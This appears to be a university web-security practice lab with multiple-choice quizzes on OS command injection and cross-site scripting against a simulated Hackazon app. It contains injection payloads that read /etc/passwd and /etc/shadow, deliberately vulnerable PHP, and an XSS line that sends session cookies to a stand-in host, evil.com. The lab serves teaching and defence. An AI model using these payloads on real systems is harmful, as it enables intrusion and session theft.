LAB_11_Week 12

⬡ Practice lab created by Mayank Arora

Web Software Security — Command Injection & XSS

0/6

Score: 0 / 600

Navigation

Command Injection

Cross-Site Scripting

Report

Web Software Security
Lab 7 — Part 2

This lab covers two of the most critical and prevalent web vulnerabilities: OS Command Injection and Cross-Site Scripting (XSS). Both arise from insufficient input validation and have appeared in countless real-world breaches.

Work through 6 guided challenges using a simulated Hackazon vulnerable application. Each challenge has 5 multiple-choice questions worth up to 100 points.

• CI-1Background: why command injection happens and how it works
• CI-2Execute directory listing via injected OS command
• CI-3Read sensitive system files (/etc/passwd, shadow)
• XSS-1Reflected vs Stored XSS — concepts & classification
• XSS-2Stored XSS: inject persistent JavaScript into the FAQ page
• XSS-3Reflected XSS: steal session cookies via crafted link

⚠ All exercises run in this self-contained simulator. Do not attempt these techniques on systems you do not own.

CI-1

Command Injection — Concept & Setup

OS InjectionOWASP A03100 pts

★ 100 points — answer all 5 questions correctly

Background: The Hackazon My Documents page passes a user-supplied filename directly to the shell:

$page = $_GET['page']; $output = shell_exec("cat documents/$page");

Because there is no sanitisation, an attacker can append shell metacharacters. The pipe ( | ) and semicolon ( ; ) are command separators in Unix.

How this vulnerability arises

1

User navigates to /account/documents?page=terms.html

2

PHP runs: shell_exec("cat documents/terms.html") — safe

3

Attacker changes page to test|/bin/ls

4

Server runs: shell_exec("cat documents/test|/bin/ls") — shell interprets | and runs ls

5

Output of /bin/ls rendered in browser — attacker sees the directory listing

Q1.Which character(s) can be used to chain or separate OS commands in a Unix shell?

Hashtag (#) — it starts a comment

Semicolon (;) or pipe (|) — they chain commands

Dollar sign ($) — it denotes a variable

Backslash (\) — escape character

Q2.What is the primary fix for OS command injection?

Encrypt the URL parameters

Use HTTPS instead of HTTP

Never pass user input to shell functions; use parameterised APIs with whitelisting

Hide the page parameter from the URL

Q3.In ?page=test|/bin/ls, which part is the injected command?

page= (the parameter name)

test (the dummy filename)

/bin/ls (the command after the pipe separator)

documents/ (the directory prefix)

Q4.Which OWASP Top 10 category covers OS Command Injection?

A01: Broken Access Control

A02: Cryptographic Failures

A03: Injection

A05: Security Misconfiguration

Q5.What does the PHP function shell_exec() do?

Executes SQL queries against a database

Executes a system command via the shell and returns the output

Reads files from the local filesystem securely

Sends HTTP requests to remote servers

🏆

CI-1 Complete! +100 ptsYou understand command injection fundamentals. Now exploit it in practice.

CI-2

Command Injection — Directory Listing

Remote Code ExecutionHands-On100 pts

★ 100 points — use the terminal, then answer 5 questions

Task: Use the injection terminal below to explore the filesystem, then answer the questions based on your findings.

Vulnerable code: shell_exec("cat documents/" . $_GET['page'])

💡 Hints

• List current directory: test|/bin/ls    • List root: test|/bin/ls /
• Working path: test|/bin/pwd    • Server user: test|whoami

http://hackazon.jonesey.com.au/account/documents?page=terms.html

Hackazon — Injection Terminal

page=

$ Ready. Enter a page parameter and click Load Page.

/* Vulnerable PHP — /account/documents */ $page = $_GET['page']; $output = shell_exec("cat documents/" . $page); // NO sanitisation! echo "<pre>$output</pre>";

Q1.Which payload lists the files in the web root directory?

terms.html

test|/bin/ls

../ls

ls -la /var/www

Q2.After injecting test|/bin/pwd, what working directory would a typical Hackazon installation return?

/home/hackazon

/var/www/html

/etc/apache2

/root

Q3.The whoami command returns www-data. What is the significance of this?

The server is running as root, giving full system access

The web server runs as a low-privilege user, limiting but not eliminating what an attacker can access

www-data has no access to any files on the system

This means the injection failed

Q4.What flag with /bin/ls shows file sizes in human-readable format?

-r

-a

-lh

-s

Q5.Why does the shell execute the injected command when the pipe character is used in the page parameter?

PHP automatically interprets pipe characters as command separators

The web server pre-processes the URL before passing it to PHP

The unsanitised input is concatenated into a shell command string; the OS shell interprets | as a command separator

Pipe characters are decoded from URL encoding by the browser

🏆

CI-2 Complete! +100 ptsYou understand directory listing via command injection. Now read sensitive files.

CI-3

Command Injection — Reading System Files

Credential ExposureHands-On100 pts

★ 100 points — use the terminal, then answer 5 questions

Task: Using the same injection technique, attempt to read sensitive system files. /etc/passwd contains the user account list. /etc/shadow contains hashed passwords but is protected by file permissions.

💡 Hints

• Read user list: test|cat /etc/passwd
• Attempt shadow file: test|cat /etc/shadow
• Check permissions: test|/bin/ls -la /etc/shadow

http://hackazon.jonesey.com.au/account/documents?page=terms.html

Hackazon — Injection Terminal

page=

$ Ready.

Q1.Which injection payload retrieves the system user account list?

test|cat /etc/shadow

test|cat /etc/passwd

test|/bin/ls /etc

test|cat /etc/hosts

Q2.What happens when you attempt test|cat /etc/shadow as the www-data user?

The hashed passwords are returned successfully

Permission denied — /etc/shadow is root-owned and not readable by www-data

The file does not exist on Linux systems

The command is blocked by the PHP interpreter

Q3.What information in /etc/passwd is most useful to an attacker even without password hashes?

The file is entirely useless without /etc/shadow

Usernames, home directories, and shell types — enabling targeted brute-force and privilege escalation attempts

Only the UID and GID numbers, which reveal nothing useful

Encrypted password hashes stored in the x field

Q4.In the /etc/passwd entry root:x:0:0:root:/root:/bin/bash, what does the x in the second field mean?

The account is disabled

The password hash is stored in /etc/shadow, not here

The password is blank (empty string)

The account requires two-factor authentication

Q5.Which approach would best prevent command injection in the Hackazon documents page?

URL-encode the page parameter before passing it to shell_exec

Wrap shell_exec in a try/catch block

Use a whitelist of allowed filenames and serve the file directly without any shell call

Log all requests containing pipe or semicolon characters

🏆

CI-3 Complete! +100 ptsCommand injection is OWASP Top 10 #3. Fix: never pass user input to shell functions.

XSS-1

Cross-Site Scripting — Concepts

XSSOWASP A03100 pts

★ 100 points — answer all 5 questions correctly

Cross-Site Scripting (XSS) occurs when a web application includes user-supplied data in its HTML output without proper encoding. Browsers trust all content from a server — injected JavaScript executes in the victim's context.

Reflected XSS: The script is in the URL — it bounces off the server into the response.

Stored XSS: The script is saved to the database — every future visitor executes it.

Attack flow — Stored XSS

1

Attacker submits <script>alert(document.cookie)</script> in a form

2

Server stores the raw string in the database without HTML-encoding

3

Victim visits the page — server echoes the stored string into HTML

4

Browser executes the <script> in the victim's session

5

Script reads document.cookie and sends it to the attacker — session hijacked

Q1.What distinguishes Stored XSS from Reflected XSS?

Stored XSS uses SQL; Reflected XSS uses JavaScript

Stored XSS persists in the database and affects all visitors; Reflected XSS only affects users who click a crafted link

Reflected XSS is more dangerous because it is harder to detect

There is no difference — both work identically

Q2.Why does XSS bypass the Same Origin Policy (SOP)?

The attacker's script runs from a different domain, which SOP ignores

The script is served by the legitimate site — SOP allows same-origin scripts to access cookies and DOM, so the injected script inherits those privileges

Browsers don't enforce SOP for JavaScript inside forms

XSS only works on HTTP sites, not HTTPS

Q3.What is the primary defence against XSS?

Block all form submissions containing angle brackets

Use HTTPS on the server

HTML-encode all user-supplied output — e.g. < becomes &lt; — using PHP's htmlspecialchars()

Require users to log in before viewing comments

Q4.Which browser property does an XSS attacker commonly target to hijack a user session?

window.location.href

navigator.userAgent

document.cookie

document.title

Q5.A search page echoes the user's query directly into the HTML response without encoding. This is an example of:

Stored (Persistent) XSS

Reflected (Non-Persistent) XSS

DOM-Based XSS

SQL Injection

🏆

XSS-1 Complete! +100 ptsSolid understanding of XSS theory. Now exploit it hands-on.

XSS-2

Stored XSS — FAQ Injection

Stored XSSHands-On100 pts

★ 100 points — trigger the XSS in the simulator, then answer 5 questions

Background: The FAQ page stores questions raw and echoes them without encoding.

Vulnerable: echo "<p>" . $question . "</p>";
Fix: echo "<p>" . htmlspecialchars($question) . "</p>";

💡 Hints — try these payloads in the form

Classic: <script>alert('XSS!!')</script>    Alternative: <img src=x onerror="alert('XSS!')">

http://hackazon.jonesey.com.au/faq

Frequently Asked Questions

I want to return my purchase! What do I do?

Do you accept international credit cards?

What can cause my order to be delayed?

Question / Payload

✓ XSS payload fired! Proceed to answer the questions below.

Q1.Why does submitting <script>alert('XSS!!')</script> as a FAQ question execute as code?

The browser automatically executes any text that starts with <script

The server echoes the stored string into the HTML response without HTML-encoding, so the browser parses it as a script element

PHP eval() is called on all database content before rendering

The form posts directly to a JavaScript handler on the client

Q2.Why is Stored XSS more dangerous than Reflected XSS?

Stored XSS can only steal cookies while Reflected XSS cannot

The malicious payload is harder to write for Reflected XSS

The payload persists in the database and executes automatically for every visitor without any social engineering required

Stored XSS bypasses HTTPS while Reflected XSS does not

Q3.The <img src=x onerror="alert('XSS!')"> payload works because:

Images always trigger JavaScript when loaded

The image src fails to load, triggering the onerror event handler which executes JavaScript

The img tag is a special PHP element that evaluates attributes as code

The browser runs onerror handlers before enforcing the Same Origin Policy

Q4.What PHP function would prevent the stored XSS by encoding the output correctly?

strip_tags()

addslashes()

htmlspecialchars() with ENT_QUOTES and UTF-8

base64_encode()

Q5.An attacker stores this payload in the FAQ: <script>new Image().src='http://evil.com/?c='+document.cookie</script>. What happens when a logged-in admin views the page?

Nothing — script tags in forms are always blocked by browsers

An image is loaded from evil.com but no data is sent

The admin's session cookies are silently sent to evil.com in the image request URL, allowing the attacker to hijack the admin session

The browser prompts the admin before making cross-origin requests

🏆

XSS-2 Complete! +100 ptsYou injected persistent JavaScript. Every visitor to that FAQ page would now execute your script.

XSS-3

Reflected XSS — Cookie Theft

Reflected XSSSession Hijack100 pts

★ 100 points — trigger the reflected XSS, then answer 5 questions

Background: The Hackazon search page reflects the search term into the page without encoding. Inject JavaScript that reads document.cookie to expose the victim's session.

💡 Step by Step

Step 1 — basic XSS: <script>alert('XSS')</script>
Step 2 — steal cookie: <script>alert(document.cookie)</script>

http://hackazon.jonesey.com.au/search?searchString=

Hackazon — Search

Search by «»

No products found.

Simulated Session Cookie

PHPSESSID=545b0ngecpe2ugulf7eb7iufb0; visited_products=%2C116%2C1%2C

✓ XSS triggered! Proceed to answer the questions below.

Q1.Which payload reveals the session cookie in an alert when searched?

<script>alert('hello')</script>

<script>alert(document.cookie)</script>

<script>console.log(document.cookie)</script>

test|cat /etc/passwd

Q2.To silently exfiltrate the stolen cookie to an attacker's server, which JavaScript technique is used?

document.write(document.cookie)

new Image().src='http://evil.com/?c='+document.cookie

fetch('/send-cookie')

localStorage.setItem('cookie', document.cookie)

Q3.How would the HttpOnly cookie flag prevent this attack?

It encrypts the cookie value so the attacker cannot use it

It prevents JavaScript from reading the cookie via document.cookie, so the XSS payload cannot access the session token

It limits the cookie to HTTPS connections only

It blocks all cross-origin image requests carrying cookies

Q4.A victim clicks this link: http://hackazon.com/search?searchString=<script>...</script>. What type of XSS is this?

Stored (Persistent) XSS — the script is saved to the database

Reflected (Non-Persistent) XSS — the script exists only in the URL and is reflected in the response

DOM-Based XSS — the server is never involved

Second-Order XSS — the payload is executed on a different page

Q5.Which HTTP response header helps defend against XSS by restricting which scripts the browser will execute?

X-Frame-Options

Strict-Transport-Security

Content-Security-Policy (CSP)

X-Content-Type-Options

🏆

XSS-3 Complete! +100 ptsYou demonstrated a complete session-hijacking attack chain. In a real attack, this cookie gives the attacker full account access.

★

Lab Report & Score

CSE1CPR Lab 7 Part 2

🎖

FINAL SCORE

0

out of 600 points

Challenge	Topic	Max	Earned	Status
CI-1	Command Injection — Concept & Setup	100	0	—
CI-2	Directory Listing via Injection	100	0	—
CI-3	Reading System Files	100	0	—
XSS-1	XSS Concepts Quiz	100	0	—
XSS-2	Stored XSS — FAQ Injection	100	0	—
XSS-3	Reflected XSS & Cookie Theft	100	0	—
Total		600	0	—

⚠️

Browser Alert (Simulated)

XSS!!